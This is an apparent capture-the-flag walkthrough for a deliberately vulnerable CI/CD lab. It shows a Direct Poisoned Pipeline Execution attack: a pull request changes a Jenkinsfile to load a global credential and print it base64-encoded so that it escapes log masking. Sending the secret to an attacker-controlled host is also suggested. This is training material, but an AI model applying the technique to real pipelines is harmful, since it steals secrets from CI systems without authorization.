-brightgreen){kind=icon}
Create a pull request and execute a Direct-PPE attack against the Wonderland/white-rabbit repository to steal the flag1 secret.
The flag is stored in the Jenkins credential store with the Global scope, which makes it accessible to any pipeline on the Jenkins instance.
-
Clone the Wonderland/white-rabbit repository.
-
Checkout to a new branch.
git checkout -b challenge1
-
Modify the Jenkinsfile to load flag1, and print it to the Jenkins build console output which you have access to (encode it so it won’t be masked), or send it to a host you control.
stage ('Install_Requirements') { steps { withCredentials([string(credentialsId: 'flag1', variable: 'flag1')]) { sh ''' echo $flag1 | base64 ''' } } }
-
Push the changes to the remote branch and create a pull request. A pipeline will be triggered automatically.
-
Access the console output of the executed job to get the encoded secret.
